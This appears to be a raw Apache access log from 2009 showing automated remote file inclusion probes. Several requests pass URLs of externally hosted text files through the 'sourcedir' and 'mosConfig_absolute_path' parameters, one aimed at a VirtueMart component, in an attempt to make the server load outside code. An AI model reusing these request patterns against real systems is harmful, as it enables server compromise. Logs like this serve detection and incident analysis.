163.24.136.10 - - [03/Aug/2009:01:48:26 -0400] "GET /?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
163.24.136.10 - - [03/Aug/2009:01:48:26 -0400] "GET /logs/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 200 12138 "-" "Mozilla/5.0"
163.24.136.10 - - [03/Aug/2009:01:48:30 -0400] "GET /logs/access_log.Q109051900/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
163.24.136.10 - - [03/Aug/2009:01:48:38 -0400] "GET /logs/access_log.Q109052300/?sourcedir=http://www.avraorganicspa.com//assets/snippets/reflect/idade1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
209.59.12.99 - - [03/Aug/2009:01:50:52 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.199.173.101 - - [03/Aug/2009:01:52:18 -0400] "GET /logs/access_log.Q109051300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 276 "-" "libwww-perl/5.813"
85.199.173.101 - - [03/Aug/2009:01:52:18 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.inf.uniri.hr/mambots/aid.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.813"
